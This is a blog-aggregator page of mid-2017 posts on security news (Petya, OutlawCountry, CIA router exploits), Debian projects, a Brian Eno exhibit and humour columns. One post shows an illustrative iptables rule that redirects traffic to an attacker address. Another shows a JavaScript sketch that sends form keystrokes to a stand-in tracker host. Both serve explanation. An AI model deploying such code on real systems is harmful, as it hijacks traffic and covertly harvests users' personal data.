Planet Russell


Sam Varghese: Sage advice

A wise old owl sat on an oak;

The more he saw, the less he spoke;

The less he spoke, the more he heard;

Why aren’t we like this wise, old bird?

Cryptogram: Good Article About Google's Project Zero

Fortune magazine just published a good article about Google's Project Zero, which finds and publishes exploits in other companies' software products.

I have mixed feelings about it. The project does great work, and the Internet has benefited enormously from these efforts. But as long as it is embedded inside Google, it has to deal with accusations that it targets Google competitors.

Planet Debian: Arturo Borrero González: About the OutlawCountry Linux malware


Today I noticed the internet buzz about a new alleged Linux malware called OutlawCountry, attributed to the CIA and leaked by WikiLeaks.

The malware redirects traffic from the victim to a control server in order to spy or whatever. To redirect this traffic, they use simple Netfilter NAT rules injected in the kernel.

According to many sites commenting on the issue, it seems that there is something wrong with the Linux kernel Netfilter subsystem. But I read the leaked docs, and what the attackers do is load a custom kernel module in order to be able to load Netfilter NAT tables/rules with higher priority than the default ones (overriding any config the system may have).

Isn’t that clear? The attacker is loading a custom kernel module as root on your machine. They don’t use Netfilter to break into your system. The problem is not Netfilter; the problem is your whole machine being under their control.
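To make the point concrete, here is the kind of NAT rule such a module ends up injecting (the address and port are invented for illustration; this is not the actual OutlawCountry rule set):

```shell
# Illustrative only: a DNAT rule that silently rewrites outbound web
# traffic toward an attacker-controlled host (10.0.0.5 is made up).
iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j DNAT --to-destination 10.0.0.5:80

# Installing rules like this requires root. The leaked docs describe a
# custom module that registers a hidden NAT table consulted before the
# standard "nat" table, so its rules win over whatever the administrator
# configured.
```

In other words, the Netfilter rule is the payload, not the vulnerability: it can only be installed once root access has already been obtained.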

With root control of the machine, they could simply use any mechanism, like kpatch or whatever, to replace your whole running kernel with a new one, with full access to memory, networking, file system et al.

They probably use a rootkit or the like to take over the system.

Worse Than Failure: Error'd: Best Null I Ever Had

"Truly the best null I've ever had. Definitely would purchase again," wrote Andrew R.

 

"Apparently, the Department of Redundancy Department got a hold of the internet," writes Ken F.

 

Berend writes, "So, if I enter 'N' does that mean I'll be instantly hit by a death ray?"

 

"Move over, fake news, Google News has this thing," wrote Jack.

 

Evan C. writes, "I honestly wouldn't put it past parents in Canada to register their yet-to-be-born children for hockey 10 years in advance."

 

"I think that a problem has, um, something, to that computer," writes Tyler Z.

 

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet Debian: Michal Čihař: Weblate 2.15

Weblate 2.15 has been released today. It is slightly behind schedule, which was mostly caused by my vacation. As with 2.14, there are quite a lot of security improvements based on reports we got from our HackerOne program, as well as various new features.

Full list of changes:

  • Show more related translations in other translations.
  • Add option to see translations of current unit to other languages.
  • Use 4 plural forms for Lithuanian by default.
  • Fixed upload for monolingual files of different format.
  • Improved error messages on failed authentication.
  • Keep page state when removing word from glossary.
  • Added direct link to edit secondary language translation.
  • Added Perl format quality check.
  • Added support for rejecting reused passwords.
  • Extended toolbar for editing RTL languages.

If you are upgrading from older version, please follow our upgrading instructions.

You can find more information about Weblate on https://weblate.org; the code is hosted on GitHub. If you are curious how it looks, you can try it out on the demo server. You can log in there with the demo account using the demo password, or register your own user. Weblate is also being used on https://hosted.weblate.org/ as the official translating service for phpMyAdmin, OsmAnd, Turris, FreedomBox, Weblate itself and many other projects.

Should you be looking for hosting of translations for your project, I'm happy to host them for you or help with setting it up on your infrastructure.

Further development of Weblate would not be possible without people providing donations; thanks to everybody who has helped so far! The roadmap for the next release is just being prepared, and you can influence it by expressing support for individual issues, either by commenting or by providing a bounty for them.

Filed under: Debian English SUSE Weblate

Planet Debian: Daniel Pocock: A FOSScamp by the beach

I recently wrote about the great experience many of us had visiting OSCAL in Tirana. Open Labs is doing a great job promoting free, open source software there.

They are now involved in organizing another event at the end of the summer, FOSScamp in Syros, Greece.

Looking beyond the promise of sun and beach, FOSScamp is also just a few weeks ahead of the Outreachy selection deadline, so anybody who wants to meet potential candidates in person may find this event helpful.

If anybody wants to discuss the possibilities for involvement in the event then the best place to do that may be on the Open Labs forum topic.

What will tomorrow's leaders look like?

While watching a talk by Joni Baboci, head of Tirana's planning department, I was pleasantly surprised to see this photo of Open Labs board members attending the town hall for the signing of an open data agreement:

It's great to see people finding ways to share the principles of technological freedoms far and wide and it will be interesting to see how this relationship with their town hall grows in the future.

Long Now: 10 Years Ago: Brian Eno’s 77 Million Paintings in San Francisco, 02007


Long Now co-founders Stewart Brand (center)
and Brian Eno (right) in San Francisco, 02007

Exactly a decade ago today, in June 02007, Long Now hosted the North American Premiere of Brian Eno’s 77 Million Paintings. It was a celebration of Eno’s unique generative art work, as well as the inaugural event of our newly launched Long Now Membership program.

Here’s how we described the large scale art work at the time:

Conceived by Brian Eno as “visual music”, his latest artwork 77 Million Paintings is a constantly evolving sound and imagescape which continues his exploration into light as an artist’s medium and the aesthetic possibilities of “generative software”.

We presented 77 Million Paintings over three nights at San Francisco’s Yerba Buena Center for the Arts (YBCA) on June 29 & 30 and July 1, 02007.

The Friday and Saturday shows were packed with about 900 attendees each. On Sunday we hosted a special Long Now members night. The crowd was smaller with only our newly joined charter members plus Long Now staff and Board, including the artist himself.

Long Now co-founder Brian Eno at his 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Brian Eno came in from London for the event. While he’d shown this work at the Venice Biennale, the Milan Triennale, and in Tokyo, London and South Africa, this was its first showing in the U.S. (or anywhere in North America). The presentation itself was a unique large scale projection created collaboratively with San Francisco’s Obscura Digital creative studio.

The installation was in a large, dark room accompanied by generative ambient Eno music. The audience could sit in chairs at the back of the room, sink into bean bags, or lie down on rugs or the floor closer to the screens. Like the Ambient Painting at The Interval and other examples of Eno’s generative visual art, a series of high resolution images slowly fade in, layer over each other, and fade out again at a glacial pace: brilliant colors, constantly transforming at a rate so slow it is difficult to track, until you notice the image is completely different.

Close up of 77 Million Paintings at the opening in San Francisco, 02007; photo by Robin Rupe

Close up of 77 Million Paintings at the opening in San Francisco, 02007; photo by Robin Rupe

Long Now Executive Director Alexander Rose also spoke:

About the work: Brian Eno discusses 77 Million Paintings with Wired News (excerpt):

Eno: The pieces surprise me. I have 77 Million Paintings running in my studio a lot of the time. Occasionally I’ll look up from what I’m doing and I think, “God, I’ve never seen anything like that before!” And that’s a real thrill.
Wired News: When you look at it, do you feel like it’s something that you had a hand in creating?
Eno: Well, I know I did, but it’s a little bit like if you are dealing hands of cards and suddenly you deal four aces. You know it’s only another combination that’s no more or less likely than any of the other combinations of four cards you could deal. Nonetheless, some of the combinations are really striking. You think, “Wow — look at that one.” Sometimes some combination comes up and I know it’s some result of this system that I invented, but nonetheless I didn’t imagine such a thing could be produced by it.

The exterior of Yerba Buena Center for the Arts (YBCA) has its own beautiful illumination:

There was a simultaneous virtual version of 77 Million Paintings ongoing in Second Life:

Here’s video of the Second Life version of 77 Million Paintings. Looking at it today gives you some sense of what the 02007 installation was like in person:

We brought the prototype of the 10,000 Year Clock’s Chime Generator to YBCA (this was 7 years before it was converted into a table for the opening of The Interval):

The Chime Generator was outfitted with tubular bells at the time:

10,000 Year Clock Chime Generator prototype at 77 Million Paintings in San Francisco, 02007; photo by Scott Beale

After two days open to the public, the closing night event was a performance and a party exclusively for Long Now members. Our membership program was brand new then, and many charter members joined just in time to attend the event. So a happy anniversary to all of you who are celebrating a decade as a Long Now member!

Brian Eno, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Members flew in from around the country for the event. Long Now’s founders were all there. This began a tradition of Long Now special events with members, which have included Longplayer / Long Conversation (also at YBCA) and our two Mechanicrawl events, which explored San Francisco’s mechanical wonders.

Here are a few more photos of Long Now staff and friends who attended:

Long Now co-founder Danny Hillis, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Burning Man co-founder Larry Harvey and Long Now co-founder Stewart Brand at 77 Million Paintings opening in San Francisco; photo by Scott Beale

Kevin Kelly and Louis Rosetto, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Lori Dorn and Jeffrey & Jillian of Because We Can at the 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Long Now staff Mikl-em & Danielle Engelman at the 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Thanks to Scott Beale / Laughing Squid, Robin Rupe, and myself for the photos used above. Please mouse over each to see the photo credit.

Brian Eno at 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

More photos from Scott Beale. More photos of the event by Mikl Em.

More on the production from Obscura Digital.


Cory Doctorow: I’ll see you this weekend at Denver Comic-Con!




I just checked in for my o-dark-hundred flight to Denver tomorrow morning for this weekend’s Denver Comic-Con, where I’m appearing for several hours on Friday, Saturday and Sunday, including panels with some of my favorite writers, like John Scalzi, Richard Kadrey, Catherynne Valente and Scott Sigler:


Friday:


* 1:30-2:30pm The Future is Here :: Room 402
How have recent near-future works fared in preparing us for the realities of the current day? What can near-future works being published now tell us about what’s coming?
Mario Acevedo, Cory Doctorow, Sherry Ficklin, Richard Kadrey, Dan Wells

* 2:30-4:30pm Signing :: Tattered Cover Signing Booth


* 4:30-5:30pm Fight The Power! Fiction For Political Change :: Room 402
Some authors incorporate political themes and beliefs into their stories. In this tumultuous political climate, even discussions of a political nature in fiction can resonate with readers, and could even be a source of change. Our panelists will talk about what they have done in their books to cause change, and the (desired) results.
Charlie Jane Anders, Cory Doctorow, John Scalzi, Emily Singer, Ausma Zehanat Khan

Saturday:

* 12:00-1:00pm The Writing Process of Best Sellers :: Room 407
The authors of today’s best sellers discuss their technical process and offer creative insight.
Eneasz Brodski, Cory Doctorow, John Scalzi, Catherynne Valente


* 1:30-2:30pm Creating the Anti-Hero :: Room 402
Millennials both read and write YA, and they’re sculpting the genre to meet this generation’s needs. Authors of recent YA titles discuss writing for the modern YA audience and how their books contribute to the genre.
Pierce Brown, Delilah Dawson, Cory Doctorow, Melissa Koons, Catherynne Valente, Dan Wells

* 3:30-4:30pm Millennials Rising – YA Literature Today :: Room 402
Millennials both read and write YA, and they’re sculpting the genre to meet this generation’s needs. Authors of recent YA titles discuss writing for the modern YA audience and how their books contribute to the genre.
Pierce Brown, Delilah Dawson, Cory Doctorow, Melissa Koons, Catherynne Valente, Dan Wells

* 4:30-6:30pm Signing :: Tattered Cover Signing Booth

Sunday:

11:00am-12:00pm Economics, Value and Motivating your Character :: Room 407
How do money and economics figure into writing compelling characters? The search for money in our daily lives fashions our character, and in fiction it can be the cause of turning good people into bad, making characters do things that are, well, out of character. Money is the great motivator; find out how these authors use it to shape their characters and move the story along.
Dr. Jason Arentz, Cory Doctorow, Van Aaron Hughes, Matt Parrish, John Scalzi

12:30-2:30pm Signing :: Tattered Cover Signing Booth

3:00-4:00pm Urban Science Fiction :: DCCP4 – Keystone City Room
The sensibility and feel of Urban Fantasy, without the hocus-pocus. These tend to be stories that could happen tomorrow, with the direct consequences of today’s technologies and today’s societies. Urban Science Fiction authors discuss writing the world we don’t yet live in, but could!
Cory Doctorow, Sue Duff, Richard Kadrey, Cynthia Richards, Scott Sigler

(Image: Pat Loika, CC-BY)

Cryptogram: The Women of Bletchley Park

Really good article about the women who worked at Bletchley Park during World War II, breaking German Enigma-encrypted messages.

Cryptogram: Websites Grabbing User-Form Data Before It's Submitted

Websites are sending information prematurely:

...we discovered NaviStone's code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

This is important because it goes against what people expect:

In yesterday's report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a "send" or "submit" button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user's expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, "would not be laughed out of court."

This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We've long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.
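The technique the excerpt describes is trivially easy to implement. Here is a minimal sketch (the `watchField` helper, the field name and the endpoint are invented for illustration; this is not NaviStone's actual code):

```javascript
// Send a form field's contents as the user types, before any submit.
// "field" is anything with addEventListener and a .value property.
function watchField(field, send) {
  field.addEventListener("input", () => {
    // Fires on every keystroke or autofill -- no submit button needed.
    send({ name: field.name, value: field.value });
  });
}

// On a real page this would be wired up roughly like:
//   watchField(document.querySelector("#email"),
//              data => fetch("https://tracker.example/collect", {
//                method: "POST",
//                body: JSON.stringify(data),
//              }));
```

Because the handler fires on every input event, the server has the data even if the visitor never presses "submit", which is exactly the expectation violation Calo describes.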

Worse Than Failure: The Agreement

In addition to our “bread and butter” of bad code, bad bosses, worse co-workers and awful decision-making, we always love the chance to turn out the occasional special event. This time around, our sponsors at Hired gave us the opportunity to build and film a sketch.

I’m super-excited for this one. It’s a bit more ambitious than some of our previous projects, and pulled together some of the best talent in the Pittsburgh comedy community to make it happen. Everyone who worked on it- on set or off- did an excellent job, and I couldn't be happier with the results.

Once again, special thanks to Hired, who not only helped us produce this sketch, but also helps us keep the site running. With Hired, instead of applying for jobs, your prospective employer will apply to interview you. You get placed in control of your job search, and Hired provides a “talent advocate” who can provide unbiased career advice and make sure you put your best foot forward. Sign up now, and find the best opportunities for your future with Hired.

And now, our feature presentation: The Agreement

Brought to you by:

[Advertisement] BuildMaster integrates with an ever-growing list of tools to automate and facilitate everything from continuous integration to database change scripts to production deployments. Interested? Learn more about BuildMaster!


Planet Debian: Steve Kemp: Yet more linux security module craziness ..

I've recently been looking at Linux security modules (LSMs). My first two experiments helped me learn:

My First module - whitelist_lsm.c

This looked for the presence of an xattr, and if present allowed execution of binaries.

I learned about the Kernel build-system, and how to write a simple LSM.

My second module - hashcheck_lsm.c

This looked for the presence of a "known-good" SHA1 hash xattr, and if it matched the actual hash of the file on-disk allowed execution.

I learned how to hash the contents of a file, from kernel-space.

Both allowed me to learn things, but both were a little pointless. They were not fine-grained enough to allow different things to be done by different users. (i.e. if you allowed "alice" to run "wget", you'd also allow www-data to do the same.)

So, assuming you wanted to do your security job more neatly, what would you want? You'd want to allow/deny execution of commands based upon:

  • The user who was invoking them.
  • The path of the binary itself.

So your local users could run "bad" commands, but "www-data" (post-compromise) couldn't.

Obviously you don't want to have to recompile your kernel to change the rules of who can execute what. So you think to yourself, "I'll write those rules down in a file". But of course reading a file from kernel-space is tricky, and parsing any list of rules in a file from kernel-space would be prone to buffer-related problems.

So I had a crazy idea:

  • When a user attempts to execute a program.
  • Call back to user-space to see if that should be permitted.
    • Give the user-space binary the UID of the invoker, and the path to the command they're trying to execute.

Calling userspace? Every time a command is to be executed? Crazy. But it just might work.

One problem I had with this approach is that userspace might not even be available when you're booting. So I set up a flag to enable this stuff:

# echo 1 >/proc/sys/kernel/can-exec/enabled

Now the kernel will invoke the following on every command:

/sbin/can-exec $UID $PATH

Because the kernel waits for this command to complete - as it reads the exit-code - you cannot execute any child-processes from it, as you'd end up in recursive hell, but you can certainly read files, write to syslog, etc. My initial implementation was as basic as this:

int main( int argc, char *argv[] )
{
...

  // Get the UID + Program
  int uid = atoi( argv[1] );
  char *prg = argv[2];

  // syslog
  openlog ("can-exec", LOG_CONS | LOG_PID | LOG_NDELAY, LOG_LOCAL1);
  syslog (LOG_NOTICE, "UID:%d CMD:%s", uid, prg );

  // root can do all.
  if ( uid == 0 )
    return 0;

  // nobody
  if ( uid == 65534 ) {
    if ( ( strcmp( prg , "/bin/sh" ) == 0 ) ||
         ( strcmp( prg , "/usr/bin/id" ) == 0 ) ) {
      fprintf(stderr, "Allowing 'nobody' access to shell/id\n" );
      return 0;
    }
  }

  fprintf(stderr, "Denied\n" );
  return -1;
}

Although the UIDs are hard-coded it actually worked! Yay!

I updated the code to convert the UID to a username, then check executables via the file /etc/can-exec/$USERNAME.conf, and this also worked.

I don't expect anybody to actually use this code, but I do think I've reached a point where I can pretend I've written a useful (or non-pointless) LSM at last. That means I can stop.

Google Adsense: AdSense now understands Urdu

Today, we’re excited to announce the addition of Urdu, a language spoken by millions in Pakistan, India and many other countries around the world, to the family of AdSense supported languages.

Interest in Urdu language content has been growing steadily over the last few years. AdSense provides an easy way for publishers to monetize the content they create in Urdu, and helps advertisers looking to connect with the growing online Urdu audience reach them with relevant ads.

To start monetizing your Urdu content website with Google AdSense:

  1. Check the AdSense program policies and make sure your website is compliant. 
  2. Sign up for an AdSense account.
  3. Add the AdSense code to start displaying relevant ads to your users.

Welcome to AdSense!



Posted by: AdSense Internationalization Team

Cryptogram: Girl Scouts to Offer Merit Badges in Cybersecurity

The Girl Scouts are going to be offering 18 merit badges in cybersecurity, to scouts as young as five years old.

Cryptogram: CIA Exploits Against Wireless Routers

WikiLeaks has published CherryBlossom, the CIA's program to hack into wireless routers. The program is about a decade old.

Four good news articles. Five. And a list of vulnerable routers.

Worse Than Failure: News Roundup: The Internet of Nope

Folks, we’ve got to talk about some of the headlines about the Internet of “Things”. If you’ve been paying even a little attention to that space, you know that pretty much everything getting released is some combination of several WTFs, whether in conception, implementation, or, let’s not forget, security.


I get it. It’s a gold-rush business. We’ve got computers that are so small, so cheap, and so power-efficient, that we can slap the equivalent of a 1980s super-computer in a toilet seat. There's the potential to create products that make our lives better, that make the world better, and could carry us into a glowing future. It just sometimes feels like that's not what anybody's actually trying to make, though. Without even checking, I’m sure you can buy a WiFi enabled fidget spinner that posts the data to a smartphone app where you can send “fidges” to your friends, bragging about your RPMs.

We need this news-roundup, because when Alexa locks you out of your house because you didn’t pay for Amazon Prime this month, we can at least say “I told you so”. You think I’m joking, but Burger King wants in on that action, with its commercial that tries to trick your Google Assistant into searching for burgers. That’s also not the first time that a commercial has triggered voice commands, and I can guarantee that it isn’t going to be the last.

Now, maybe this is sour grapes. I bought a Nest thermostat before it was cool, and now three hardware generations on, I’m not getting software updates, and there are rumors about the backend being turned off someday. Maybe Nest needs a model more like “Hive Hub”. Hive is a startup with £500M invested, making it one of the only “smart home” companies with an actual business model. Of course, that business model is that you’ll pay $39.99 per month to turn your lights on and off.

At least you know that some of that money goes to keeping your smart-home secure. I’m kidding, of course- nobody spends any effort on making these devices secure. There are many, many high profile examples of IoT hacks. You hook your toaster up to the WiFi and suddenly it’s part of a botnet swarm mining BitCoins. One recent, high-profile example is the ZigBee Protocol, which powers many smart-home systems. It’s a complete security disaster, and opens up a new line of assault- instead of tricking a target to plug a thumb drive into their network, you can now put your payload in a light bulb.

Smart-homes aside, IoT in general is a breeding ground for botnets. Sure, your uncle Jack will blindly click through every popup and put his computer password in anything that looks like a password box, but at least you can have some confidence that his Windows/Mac/Linux desktop has some rudimentary protections bundled with the OS. IoT vendors apparently don’t care.

Let’s take a break, and take a peek at a fun story about resetting a computerized lock. Sure, they could have just replaced the lock, but look at all the creative hackery they had to do to get around it.

With that out of the way, let’s talk about tea. Ever since the Keurig coffee maker went big, everyone’s been trying to be “the Keurig for waffles” or “the Keurig for bacon” or “the Keurig for juice”- the latter giving us the disaster that is the Juicero. Mash this up with the Internet of Things, and you get this WiFi enabled tea-maker, which can download recipes for brewing tea off the Internet. And don’t worry, it’ll always use the correct recipe, because each pod is loaded with an RFID tag that not only identifies which recipe to use, but ensures that you’re not using any unauthorized tea.

In addition to the “Keurig, but for $X,” there’s also the ever popular “the FitBit, but for $X.” Here’s the FitBit for desks. It allows your desk to nag you about getting up, moving around, and it’ll upload your activity to the Internet while it’s at it. I’m sure we’re all really excited for when our “activity” gets logged for future review.

Speaking of FitBits, Qualcomm just filed some patents for putting that in your workout shoes. This is actually not a totally terrible idea- I mean, by standards of that tea pot, anyway. I share it here because they’re calling it “The Internet of Shoes” which is a funny way of saying, “our marketing team just gave up”.

Finally, since we’re talking about Internet connected gadgets that serve no real purpose, Google Glass got its first software update in three years. Apparently Google hasn’t sent the Glass to a farm upstate, where it can live with Google Reader, Google Wave, Google Hangouts, and all the other projects Google got bored of.

[Advertisement] Application Release Automation – build complex release pipelines all managed from one central dashboard, accessibility for the whole team. Download and learn more today!


Krebs on Security: ‘Petya’ Ransomware Outbreak Goes Global

A new strain of ransomware dubbed “Petya” is worming its way around the world with alarming speed. The malware is spreading using a vulnerability in Microsoft Windows that the software giant patched in March 2017 — the same bug that was exploited by the recent and prolific WannaCry ransomware strain.

The ransom note that gets displayed on screens of Microsoft Windows computers infected with Petya.


According to multiple news reports, Ukraine appears to be among the hardest hit by Petya. The country’s government, some domestic banks and largest power companies all warned today that they were dealing with fallout from Petya infections.

Danish transport and energy firm Maersk said in a statement on its Web site that “We can confirm that Maersk IT systems are down across multiple sites and business units due to a cyber attack.” In addition, Russian energy giant Rosneft said on Twitter that it was facing a “powerful hacker attack.” However, neither company referenced ransomware or Petya.

Security firm Symantec confirmed that Petya uses the “Eternal Blue” exploit, a digital weapon that was believed to have been developed by the U.S. National Security Agency and in April 2017 leaked online by a hacker group calling itself the Shadow Brokers.

Microsoft released a patch for the Eternal Blue exploit in March (MS17-010), but many businesses put off installing the fix. Many of those that procrastinated were hit with the WannaCry ransomware attacks in May. U.S. intelligence agencies assess with medium confidence that WannaCry was the work of North Korean hackers.

Organizations and individuals who have not yet applied the Windows update for the Eternal Blue exploit should patch now. However, there are indications that Petya may have other tricks up its sleeve to spread inside of large networks.

Russian security firm Group-IB reports that Petya bundles a tool called “LSADump,” which can gather passwords and credential data from Windows computers and domain controllers on the network.

Petya seems to be primarily impacting organizations in Europe, however the malware is starting to show up in the United States. Legal Week reports that global law firm DLA Piper has experienced issues with its systems in the U.S. as a result of the outbreak.

Through its Twitter account, the Ukrainian Cyber Police said the attack appears to have been seeded through a software update mechanism built into M.E.Doc, an accounting program that companies working with the Ukrainian government need to use.

Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley, said Petya appears to have been well engineered to be destructive while masquerading as a ransomware strain.

Weaver noted that Petya’s ransom note includes the same Bitcoin address for every victim, whereas most ransomware strains create a custom Bitcoin payment address for each victim.

Also, he said, Petya urges victims to communicate with the extortionists via an email address, while the majority of ransomware strains require victims who wish to pay or communicate with the attackers to use Tor, a global anonymity network that can be used to host Web sites which can be very difficult to take down.

“I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware,” Weaver said. “The best way to put it is that Petya’s payment infrastructure is a fecal theater.”

Ransomware encrypts important documents and files on infected computers and then demands a ransom (usually in Bitcoin) for a digital key needed to unlock the files. With most ransomware strains, victims who do not have recent backups of their files are faced with a decision to either pay the ransom or kiss their files goodbye.

Ransomware attacks like Petya have become such a common pestilence that many companies are now reportedly stockpiling Bitcoin in case they need to quickly unlock files that are being held hostage by ransomware.

Security experts warn that Petya and other ransomware strains will continue to proliferate as long as companies delay patching and fail to develop a robust response plan for dealing with ransomware infestations.

According to ISACA, a nonprofit that advocates for professionals involved in information security, assurance, risk management and governance, 62 percent of organizations surveyed recently reported experiencing ransomware in 2016, but only 53 percent said they had a formal process in place to address it.

Update: 5:06 p.m. ET: Added quotes from Nicholas Weaver and links to an analysis by the Ukrainian cyber police.

Planet Debian: Daniel Pocock: How did the world ever work without Facebook?

Almost every day, somebody tells me there is no way they can survive without some social media like Facebook or Twitter. Otherwise mature adults are fearful that without these dubious services they would have no human contact ever again, that they would die of hunger and that the sky would come crashing down too.

It is particularly disturbing for me to hear this attitude from community activists and campaigners. These are people who aspire to change the world, but can you really change the system using the tools the system gives you?

Revolutionaries like Gandhi and the Bolsheviks don't have a lot in common, but both of them changed the world and both did so by going against the system. Gandhi, of course, relied on non-violence, while the Bolsheviks continued to rely on violence long after taking power. Neither of them needed social media, but both are likely to be remembered far longer than any viral video clip you have seen recently.

With US border guards asking visitors for their Facebook profiles and Mark Zuckerberg being a regular participant at secretive Bilderberg meetings, it should be clear that Facebook and conventional social media is not on your side, it's on theirs.

Kettling has never been easier

When street protests erupt in major cities such as London, the police build fences around the protesters, cutting them off from the rest of the world. They become an island in the middle of the city, like a construction site or broken down bus that everybody else goes around. The police then set about arresting one person at a time, taking their name and photograph and then slowly letting them leave in different directions. This strategy is called kettling.

Facebook helps kettle activists in their armchairs. The police state can gather far more data about them, while their impact is even more muted than if they ventured out of their homes.

You are more likely to win the lottery than make a viral campaign

Every week there is news about some social media campaign that has gone viral. Every day, marketing professionals, professional campaigners and motivated activists sit at their computer spending hours trying to replicate this phenomenon.

Do the math: how many of these campaigns can really be viral success stories? Society can only absorb a small number of these campaigns at any one time. For most of the people trying to ignite such campaigns, their time and energy is wasted, much like money spent buying lottery tickets and with odds that are just as bad.

It is far better to focus on the quality of your work in other ways than to waste any time on social media. If you do something that is truly extraordinary, then other people will pick it up and share it for you and that is how a viral campaign really begins. The time and effort you put into trying to force something to become viral is wasting the energy and concentration you need to make something that is worthy of really being viral.

An earthquake and an escaped lion never needed to announce themselves on social media to become an instant hit. If your news isn't extraordinary enough for random people to spontaneously post, share and tweet it in the first place, how can it ever go far?

The news media deliberately over-rates social media

News media outlets, including TV, radio and print, gain a significant benefit from crowd-sourcing live information, free of charge, from the public on social media. It is only logical that they will cheer on social media sites and give them regular attention. Have you noticed that whenever Facebook's publicity department makes an announcement, the media are quick to publish it ahead of more significant stories about social or economic issues that impact our lives? Why do you think the media puts Facebook up on a podium like this, ahead of all other industries, if the media aren't getting something out of it too?

The tail doesn't wag the dog

One particular example is the news media's fascination with Donald Trump's Twitter account. Some people have gone as far as suggesting that this billionaire could have simply parked his jet and spent the whole of 2016 at one of his golf courses sending tweets and he would have won the presidency anyway. Suggesting that Trump's campaign revolved entirely around Twitter is like suggesting the tail wags the dog.

The reality is different: Trump has been a prominent public figure for decades, both in the business and entertainment world. During his presidential campaign, he had at least 220 major campaign rallies attended by over 1.2 million people in the real world. Without this real-world organization and history, the Twitter account would have been largely ignored like the majority of Twitter accounts.

On the left of politics, the media have been just as quick to suggest that Bernie Sanders and Jeremy Corbyn have been supported by the "Facebook generation". This label is superficial and deceiving. The reality, again, is a grass roots movement that has attracted young people to attend local campaign meetings in pubs up and down the country. Getting people to get out and be active is key. Social media is incidental to their campaign, not indispensable.

Real-world meetings, big or small, are immensely more powerful than a social media presence. Consider the Trump example again: if 100,000 people receive one of his tweets, how many even notice it in the non-stop stream of information we are bombarded with today? On the other hand, if 100,000 people bellow out a racist slogan at one of his rallies, is there any doubt whether each and every one of those people is engaged with the campaign at that moment? If you could choose between 100 extra Twitter followers or 10 extra activists attending a meeting every month, which would you prefer?

Do we need this new definition of a Friend?

Facebook is redefining what it means to be a friend.

Is somebody who takes pictures of you and insists on sharing them with hundreds of people, tagging your face for the benefit of biometric profiling systems, really a friend?

If you want to find out what a real friend is and who your real friends really are, there is no better way to do so than deleting your Facebook and Twitter accounts and waiting to see who contacts you personally about meeting up in the real world.

If you look at a profile on Facebook or Twitter, one of the most prominent features is the number of friends or followers they have. Research suggests that humans can realistically cope with no more than about 150 stable relationships. Facebook, however, has turned Friending people into something like a computer game.

This research is also given far more attention than it deserves, though: the number of really meaningful friendships that one person can maintain is far smaller. Think about how many birthdays and spouses' names you can remember; those may be the number of real friendships you can manage well. In his book Busy, Tony Crabbe suggests between 10 and 20 friendships are in this category, and that you should spend your time with these people rather than letting it be spread thinly across superficial Facebook "friends".

This same logic can be extrapolated to activism and marketing in its many forms: is it better for a campaigner or publicist to have fifty journalists following him on Twitter (where tweets are often lost in the blink of an eye) or three journalists who he meets for drinks from time to time?

Facebook alternatives: the ultimate trap?

Numerous free, open source projects have tried to offer an equivalent to Facebook and Twitter. GNU social, Diaspora and identi.ca are some of the better-known examples.

Trying to persuade people to move from Facebook to one of these platforms rarely works. In most cases, Metcalfe's law suggests the size of Facebook will suck them back in like the gravity of a black hole.

To help people really beat these monstrosities, the most effective strategy is to help them live without social media, whether it is proprietary or not. The best way to convince them may be to give it up yourself and let them see how much you enjoy life without it.

Share your thoughts

The FSFE community has recently been debating the use of proprietary software and services. Please feel free to join the list and click here to reply on the thread.

Planet Debian: Reproducible builds folks: Reproducible Builds: week 113 in Stretch cycle

Here's what happened in the Reproducible Builds effort between Sunday June 18 and Saturday June 24 2017:

Upcoming and Past events

Our next IRC meeting is scheduled for the 6th of July at 17:00 UTC, currently with this agenda:

  1. Introductions
  2. Reproducible Builds Summit update
  3. NMU campaign for buster
  4. Press release: Debian is doing Reproducible Builds for Buster
  5. Reproducible Builds Branding & Logo
  6. should we become an SPI member
  7. Next meeting
  8. Any other business

On June 19th, Chris Lamb presented at LinuxCon China 2017 on Reproducible Builds.

On June 23rd, Vagrant Cascadian held a Reproducible Builds question and answer session at Open Source Bridge.

Reproducible work in other projects

LEDE: firmware-utils and mtd-utils/mkfs.jffs2 now honor SOURCE_DATE_EPOCH.

Toolchain development and fixes

There was discussion on #782654 about packaging bazel for Debian.

Dan Kegel wrote a patch to use ar deterministically for Homebrew, a package manager for macOS.

Dan Kegel worked on using SOURCE_DATE_EPOCH and other reproducibility fixes in fpm, a multi-platform package builder.

The Fedora Haskell team disabled parallel builds to achieve reproducible builds.

Bernhard M. Wiedemann submitted many patches upstream:

Packages fixed and bugs filed

Patches submitted upstream:

Other patches filed in Debian:

Reviews of unreproducible packages

573 package reviews have been added, 154 have been updated and 9 have been removed this week, adding to our knowledge about identified issues.

1 issue type has been updated:

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (98)

diffoscope development

Version 83 was uploaded to unstable by Chris Lamb. This also moved the previous changes, which had been uploaded to experimental, into unstable. It included contributions from previous weeks.

You can read about these changes in our previous weeks' posts, or view the changelog directly (raw form).

We plan to maintain a backport of this and future versions in stretch-backports.

